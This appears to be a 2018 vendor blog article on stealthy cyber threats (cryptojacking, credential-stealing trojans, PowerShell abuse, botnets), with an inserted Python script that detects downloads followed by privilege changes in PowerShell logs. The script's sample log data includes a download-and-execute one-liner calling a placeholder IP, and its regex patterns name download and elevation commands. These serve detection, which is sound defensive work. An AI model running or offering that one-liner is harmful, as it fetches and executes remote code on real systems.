Cybercriminals Shift Tactics to Keep a Low Profile


Over the past several years, cyberattacks have become more targeted and sophisticated. Cybercriminals have begun to augment their attacks with advanced technologies, such as machine learning and automation, to increase the speed and efficiency of attacks and to expand the pool of potential victims by identifying and targeting multiple vulnerabilities at once. They have also expanded pay-as-you-go “as a service” attack models that make it easier to proliferate attacks. Cybercriminals have likewise demonstrated increased prowess at highly disruptive public attacks, taking large numbers of organizations, and even segments of the Internet, offline on a regular basis. However, while tactics such as DDoS and ransomware can have a major impact on a network, their disruptive nature typically leads to fairly quick remediation efforts.

Recent threat trends, however, indicate that organizations may have new cause for concern. Our Threat Landscape Report for Q2 indicates that cybercriminals are now moving away from more visible attacks in favor of subtler, yet equally effective, strategies that let them use the library of exploits and services available to them while evading immediate detection. These methods allow cybercriminals to achieve greater dwell time in which to understand and map a compromised network and to exfiltrate larger amounts of data over an extended period.

In light of this trend, it’s important that organizations understand the specific types of threats cybercriminals are now leveraging to stay under the radar, and the types of security controls they must implement to detect and minimize the impact of these attacks.

The Change in the Cyber Status Quo

Think back on some of the major cyberattacks of the past several years. It’s likely that attacks such as WannaCry and Petya come to mind. These high-profile ransomware attacks spread rapidly across the world, bringing operations to a halt in organizations across industries, particularly in the healthcare sector. While these attacks were highly disruptive for the organizations that were affected, their publicity allowed other organizations to patch the vulnerability exploited by EternalBlue and avoid infection. And because threat response efforts at affected companies started immediately, even though remediation was a time-consuming process, the impact of these attacks was mitigated.

Likewise, powerful DDoS attacks have also been a very public and common attack vector. For example, a 2016 attack on an internet management company left thousands of users unable to access a number of websites. Again, the public and disruptive nature of this attack brought it to the attention of IT teams quickly, allowing for fast response times. To compensate, the criminals had to launch more attacks against the organization throughout the day.

The common element of these attacks was their high profile. As Internet sites, security vendors, and news media raised the alarm, thousands of companies were able to harden themselves against an attack, or actively search for and remediate affected systems. Diverging from these public attacks with sophisticated exploits designed to avoid detection means that organizations will have to ensure they have the necessary threat detection and prevention measures in place before an attack occurs.

Under-the-Radar Cyber Threats

Making attacks more discreet makes it increasingly difficult for IT teams to detect them. It also allows cybercriminals to extend their dwell time in the network, enabling them to learn where critical information is stored, as well as what normal user behavior looks like, in order to better mimic it. Ultimately, this also enables them to make calculated efforts to exfiltrate even more data or other valuable collateral.

Several of these new attack strategies were outlined in our Q2 Threat Landscape Report, including:

Cryptojacking: Cryptomining malware has become a common way for cybercriminals to mine valuable cryptocurrencies by hijacking the processing power of other people’s devices. While cryptomining malware is distributed the way much malware is, through malicious links or attachments, an infected device gives little indication of having been compromised, other than perhaps slower performance, while its CPU is quietly being used to mine cryptocurrency. Until recently, cryptojacking was carried out on vulnerable servers and PCs. To evade detection, attackers used techniques such as monitoring legitimate CPU cycles so as to consume only a percentage of the unused processing power. However, cybercriminals have recently extended the reach of these attacks to IoT devices. IoT devices are more valuable for this practice because they are constantly connected, allowing attackers to mine continually; they have powerful GPU processors that can be hijacked; and they are generally dormant through much of the day, thereby maximizing the time that can be used for mining.

Information Stealing Trojans & Agents: The Q2 Threat Report further documented the shift toward under-the-radar attacks by detailing the increase in information-stealing malware and agents. For example, the Loki and Fareit malware tools are able to harvest credentials that can later be used for fraud. Another important discovery this quarter was the unauthorized use of PowerShell / Agent by malware tools. PowerShell is a commonly used and seemingly innocuous administrative tool. However, it has recently begun to be leveraged by attackers to download malicious files to the system and then change privileges, enabling lateral movement across the network. Even more challenging, the nature of a PowerShell attack, which uses a legitimate built-in tool, makes it especially difficult to detect.

Botnets: Similar to cryptojacking, botnets take over computers and IoT devices to carry out cyberattacks. While the Q2 Threat Report closely examines many of the top botnets, two in particular stand out within the context of more subtle attacks. Smominru had a strong presence this past quarter, targeting Windows platforms and allowing attackers to quietly issue commands as well as download and install files. Additionally, Gh0st allows an attacker to take full control of a device, recording keystrokes and webcam feeds as well as downloading and uploading files. This information can then be used later to obtain login credentials and more.
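The download-then-privilege-change sequence that the PowerShell passage above describes is the kind of pattern a detection rule can look for in PowerShell script-block logs. The following is an added example, not code from the original post or from Fortinet: it correlates constructed sample log events per host, and the hosts, users and the 203.0.113.5 address are hypothetical placeholders.

```python
import re
from datetime import datetime

# Constructed sample events modelled on the fields of PowerShell script-block
# logging (Windows Event ID 4104): timestamp, host, user, logged script text.
# Hosts, users and the 203.0.113.5 address are hypothetical placeholders.
SAMPLE_EVENTS = [
    ("2018-08-01T09:00:01", "ws-17", "jdoe",
     "Get-ChildItem C:\\Reports | Measure-Object"),
    ("2018-08-01T09:02:14", "ws-17", "jdoe",
     "(New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1') | IEX"),
    ("2018-08-01T09:03:40", "ws-17", "jdoe",
     "Start-Process cmd.exe -Verb RunAs -ArgumentList '/c whoami'"),
    ("2018-08-01T10:15:00", "srv-02", "svc_backup",
     "Invoke-WebRequest https://updates.example.net/patch.msi -OutFile C:\\tmp\\p.msi"),
    ("2018-08-01T11:00:00", "ws-23", "asmith",
     "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"),
]

# Indicators of a script fetching content from the network ...
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
# ... and of a script trying to run elevated or alter admin group membership.
PRIV_RE = re.compile(
    r"-Verb\s+RunAs|Add-LocalGroupMember|net\s+localgroup\s+administrators", re.I)


def find_download_then_privilege(events, window_seconds=600):
    """Return (host, user, download_ts, priv_ts) tuples where a download
    indicator is followed on the same host, within window_seconds, by a
    privilege indicator. Events may arrive unsorted; they are ordered here.
    A single script matching both patterns is recorded as the download step."""
    hits = []
    pending = {}  # host -> (user, download time) awaiting a privilege event
    for ts, host, user, script in sorted(events, key=lambda e: e[0]):
        when = datetime.fromisoformat(ts)
        if DOWNLOAD_RE.search(script):
            pending[host] = (user, when)
        elif PRIV_RE.search(script) and host in pending:
            dl_user, dl_when = pending.pop(host)
            if (when - dl_when).total_seconds() <= window_seconds:
                hits.append((host, dl_user, dl_when.isoformat(), when.isoformat()))
    return hits


def standalone_downloads(events):
    """Lower-severity view: every download indicator, for analyst review."""
    return [(h, u) for _, h, u, script in events if DOWNLOAD_RE.search(script)]


if __name__ == "__main__":
    for hit in find_download_then_privilege(SAMPLE_EVENTS):
        print("download followed by privilege change:", hit)
    print("all download indicators:", standalone_downloads(SAMPLE_EVENTS))
```

The srv-02 download is surfaced only in the lower-severity list, since no privilege indicator follows it; tune the window and patterns to the administrative tooling actually used in your environment.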

Discreet Attacks Call for Threat Detection Systems

Many of these attacks lie dormant after successfully breaching the network in order to baseline network activity and discover ways to obscure their presence and escalate privileges. Once they become active, they mimic legitimate traffic to evade detection by security tools. To address these challenges, organizations must implement threat detection controls designed to quickly detect even the most sophisticated threats and so minimize dwell time. Successful breaches are inevitable; minimizing dwell time through rapid detection and response will reduce their impact.

  • First, organizations should implement internal segmentation firewalls. This will ensure that if an attack is successful, sensitive data is isolated behind an additional layer of security while attacks are limited to a small subset of the larger distributed network.
  • IT teams should also be sure to stay aware of current threat trends by conducting or subscribing to threat research and reports. Understanding current threat trends provides context to security events, helping to determine how controls and configurations need to be altered and augmented to withstand modern attacks.
  • Finally, IT teams must incorporate integration and automation with tools such as behavioral analytics to reduce complexity, detect network, device, workflow, or application anomalies, and minimize response time.

Though NOC and SOC operations both monitor the network, they do so largely in silos, with separate tools that are not able to automatically correlate threat findings. To detect sophisticated, evasion-oriented threats, IT teams need a SIEM that provides complete visibility into each device connected across the network, including its threat potential. With this visibility, IT teams can see looming threats and issue automated remediation efforts to minimize dwell time, without falling victim to alert fatigue. For greater context, these tools must also be informed by integrated data from both the NOC and the SOC, and be tied to broader threat intelligence feeds to better identify local and global threats.

Having such an integrated view across the network, including the various security tools that have been implemented, enhances visibility into data movement and user behavior, making it easier to identify anomalous behaviors that indicate an attack.

Final Thoughts

While cybercriminals have not entirely abandoned flashier, higher-profile efforts such as ransomware and DDoS attacks, threat data shows a marked increase in new threats designed to dwell in the network and evade detection until an opportune moment arises. To address this challenge, organizations must stay aware of threat trends and popular attack vectors and increase their threat detection capabilities through advanced analytics and correlation solutions and strategies.

Read our latest Fortinet Global Threat Landscape Report to find out more about recent threat landscape trends.

Sign up for our weekly FortiGuard Threat Brief.


Copyright © 2018 IDG Communications, Inc.